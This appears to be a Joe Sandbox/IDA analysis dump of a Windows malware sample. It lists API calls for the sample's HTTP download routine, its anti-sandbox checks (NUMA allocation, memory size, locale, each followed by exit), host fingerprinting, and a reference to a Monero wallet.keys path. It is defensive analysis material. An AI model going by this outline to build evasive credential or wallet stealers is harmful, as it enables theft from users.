                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                   • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: 58e7d725d72038898e7f433bb788cd1d40b76f2be21ee535220ec9a814ded32c
                                  • Instruction ID: 3e2e1c7ffbc899bef7c95868e77c1d93282bb25e2445b5eed3b8a6df5fc63a13
                                  • Opcode Fuzzy Hash: 58e7d725d72038898e7f433bb788cd1d40b76f2be21ee535220ec9a814ded32c
                                  • Instruction Fuzzy Hash: 1E622DB5718200EFD764EFA8E98895E37F9F78C601314855BA6C6C3A4CD63F9452EB20

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                   [control-flow graph not reproduced: basic blocks e46280 through e4652d, an HTTP retrieval routine calling InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile in a loop, and InternetCloseHandle on each exit path]
                                  APIs
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44839
                                    • Part of subcall function 00E447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44849
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • InternetOpenA.WININET(00E60DFE,00000001,00000000,00000000,00000000), ref: 00E462E1
                                  • StrCmpCA.SHLWAPI(?,01CBF318), ref: 00E46303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E46335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,01CBE7B0,00000000,00000000,00400100,00000000), ref: 00E46385
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E463BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E463D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E463FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E4646D
                                  • InternetCloseHandle.WININET(00000000), ref: 00E464EF
                                  • InternetCloseHandle.WININET(00000000), ref: 00E464F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00E46503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                   • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: a937796c915a537dc136caadfefb11240414f80800a2ebebf6f0da71441fbb8e
                                  • Instruction ID: a0b56238377033778539cb9919bf396b657db83c3ad51433521c7aab08f365fb
                                  • Opcode Fuzzy Hash: a937796c915a537dc136caadfefb11240414f80800a2ebebf6f0da71441fbb8e
                                  • Instruction Fuzzy Hash: 7571AF71A00218EBDF24DFA0DC49BEE77B4BB44700F1095A9F50A7B184DBB56A89CF52

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                   [control-flow graph not reproduced: basic blocks e55510 through e55ac6, a retry loop of StrCmpCA result checks in which the Sleep call in block e55a16-e55a21 branches back to block e5557c-e55583]
                                  APIs
                                    • Part of subcall function 00E5A820: lstrlen.KERNEL32(00E44F05,?,?,00E44F05,00E60DDE), ref: 00E5A82B
                                    • Part of subcall function 00E5A820: lstrcpy.KERNEL32(00E60DDE,00000000), ref: 00E5A885
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E55644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E556A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E55857
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E55228
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E55318
                                    • Part of subcall function 00E552C0: lstrlen.KERNEL32(00000000), ref: 00E5532F
                                    • Part of subcall function 00E552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00E55364
                                    • Part of subcall function 00E552C0: lstrlen.KERNEL32(00000000), ref: 00E55383
                                    • Part of subcall function 00E552C0: lstrlen.KERNEL32(00000000), ref: 00E553AE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E5578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E55940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E55A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00E55A1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: 1c2f5b4c0375ed2c49323a8c9ed67aa75770befaeb4b6b3cf71b06984ee7ac60
                                  • Instruction ID: 7d3ca2a044569592e22b391c0f5ca8f99367da24f842b2de022bd8332e5dc851
                                  • Opcode Fuzzy Hash: 1c2f5b4c0375ed2c49323a8c9ed67aa75770befaeb4b6b3cf71b06984ee7ac60
                                  • Instruction Fuzzy Hash: C3E176729101049ACB18FBB0EC56AED73B8AF54301F449A79B94773485EF346B4DCBA2

                                  Control-flow Graph

                                  Control-flow graph for the function starting at e517a0 (legend: Executed / Not Executed); the rendered graph and its node and edge data are not reproduced here.
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00E517C5
                                  • ExitProcess.KERNEL32 ref: 00E517D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 04bdcd82b38b8b41e7e8af1208fe9b7e4de5049e663851923ef7c890dc190498
                                  • Instruction ID: ab4f082f1740f9f8927f88e7776d6a6b89d5b4c6fb09d56528ff975aaf08b2f3
                                  • Opcode Fuzzy Hash: 04bdcd82b38b8b41e7e8af1208fe9b7e4de5049e663851923ef7c890dc190498
                                  • Instruction Fuzzy Hash: 9E519BB4A04209EFCB04DFA0D954BBE77B5BF84306F10A989E842B7240D775E989CB61

                                  Control-flow Graph

                                  Control-flow graph for the function starting at e57500 (legend: Executed / Not Executed); the rendered graph and its node and edge data are not reproduced here.
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E57542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E5757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57603
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E5760A
                                  • wsprintfA.USER32 ref: 00E57640
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\$
                                  • API String ID: 1544550907-3109660283
                                  • Opcode ID: 99c0d851941ef9955e0f77e33f46b47951dd8954858bf12242e87d4f34ac2105
                                  • Instruction ID: e2ce9b7fb1c3d19ae27bb11fe5ce97a14ca1aa5cd431cbd4fc31fbdb54550fff
                                  • Opcode Fuzzy Hash: 99c0d851941ef9955e0f77e33f46b47951dd8954858bf12242e87d4f34ac2105
                                  • Instruction Fuzzy Hash: 944194B1E04248EBDB10DF94DC45BDEBBB8EF08705F100599F94977280E779AA48CBA5

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB14F8), ref: 00E598A1
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB1648), ref: 00E598BA
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB15B8), ref: 00E598D2
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB1528), ref: 00E598EA
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB1690), ref: 00E59903
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB9AD0), ref: 00E5991B
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CA66E0), ref: 00E59933
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CA6860), ref: 00E5994C
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB1678), ref: 00E59964
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB16A8), ref: 00E5997C
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB1738), ref: 00E59995
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB16C0), ref: 00E599AD
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CA6880), ref: 00E599C5
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB16D8), ref: 00E599DE
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E411D0: ExitProcess.KERNEL32 ref: 00E41211
                                    • Part of subcall function 00E41160: GetSystemInfo.KERNEL32(?), ref: 00E4116A
                                    • Part of subcall function 00E41160: ExitProcess.KERNEL32 ref: 00E4117E
                                    • Part of subcall function 00E41110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E4112B
                                    • Part of subcall function 00E41110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E41132
                                    • Part of subcall function 00E41110: ExitProcess.KERNEL32 ref: 00E41143
                                    • Part of subcall function 00E41220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E4123E
                                    • Part of subcall function 00E41220: __aulldiv.LIBCMT ref: 00E41258
                                    • Part of subcall function 00E41220: __aulldiv.LIBCMT ref: 00E41266
                                    • Part of subcall function 00E41220: ExitProcess.KERNEL32 ref: 00E41294
                                    • Part of subcall function 00E56770: GetUserDefaultLangID.KERNEL32 ref: 00E56774
                                    • Part of subcall function 00E41190: ExitProcess.KERNEL32 ref: 00E411C6
                                    • Part of subcall function 00E57850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E411B7), ref: 00E57880
                                    • Part of subcall function 00E57850: RtlAllocateHeap.NTDLL(00000000), ref: 00E57887
                                    • Part of subcall function 00E57850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E5789F
                                    • Part of subcall function 00E578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57910
                                    • Part of subcall function 00E578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E57917
                                    • Part of subcall function 00E578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00E5792F
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01CB99E0,?,00E6110C,?,00000000,?,00E61110,?,00000000,00E60AEF), ref: 00E56ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E56AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00E56AF9
                                  • Sleep.KERNEL32(00001770), ref: 00E56B04
                                  • CloseHandle.KERNEL32(?,00000000,?,01CB99E0,?,00E6110C,?,00000000,?,00E61110,?,00000000,00E60AEF), ref: 00E56B1A
                                  • ExitProcess.KERNEL32 ref: 00E56B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: 053549517661d10ae9fe141f8f38ff61aa7293af62392b8faeb0b9dacf751397
                                  • Instruction ID: 58d1fb735de1327c0009e00060526f7708dddec3a3416fd520d0f8d2e2a48099
                                  • Opcode Fuzzy Hash: 053549517661d10ae9fe141f8f38ff61aa7293af62392b8faeb0b9dacf751397
                                  • Instruction Fuzzy Hash: B23134719042189BDB04F7F0EC56BEE77B8AF44342F446A29F942B3182DF745949C7A1

                                  Control-flow Graph

                                  Control-flow graph for the function starting at e41220 (legend: Executed / Not Executed); the rendered graph and its node and edge data are not reproduced here.
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E4123E
                                  • __aulldiv.LIBCMT ref: 00E41258
                                  • __aulldiv.LIBCMT ref: 00E41266
                                  • ExitProcess.KERNEL32 ref: 00E41294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: 9e003c81df87e20d11ede1e58b78528376e2f56f3046681e002b333ddf50632f
                                  • Instruction ID: 9ec349e3804a3ea085c16a24923df563ba0e6792d6b9cd0cef0668f6b1037f8e
                                  • Opcode Fuzzy Hash: 9e003c81df87e20d11ede1e58b78528376e2f56f3046681e002b333ddf50632f
                                  • Instruction Fuzzy Hash: F4014FB0E44308FADF10DBD0DC49B9EB7B8AB04705F209445E705F6180D7B455859759

                                  Control-flow Graph

                                  Control-flow graph for the function containing e56aba-e56b22 (legend: Executed / Not Executed); the rendered graph and its node and edge data are not reproduced here.
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01CB99E0,?,00E6110C,?,00000000,?,00E61110,?,00000000,00E60AEF), ref: 00E56ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E56AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00E56AF9
                                  • Sleep.KERNEL32(00001770), ref: 00E56B04
                                  • CloseHandle.KERNEL32(?,00000000,?,01CB99E0,?,00E6110C,?,00000000,?,00E61110,?,00000000,00E60AEF), ref: 00E56B1A
                                  • ExitProcess.KERNEL32 ref: 00E56B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0


                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44849
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714


                                  APIs
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E46280: InternetOpenA.WININET(00E60DFE,00000001,00000000,00000000,00000000), ref: 00E462E1
                                    • Part of subcall function 00E46280: StrCmpCA.SHLWAPI(?,01CBF318), ref: 00E46303
                                    • Part of subcall function 00E46280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E46335
                                    • Part of subcall function 00E46280: HttpOpenRequestA.WININET(00000000,GET,?,01CBE7B0,00000000,00000000,00400100,00000000), ref: 00E46385
                                    • Part of subcall function 00E46280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E463BF
                                    • Part of subcall function 00E46280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E463D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E55228
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
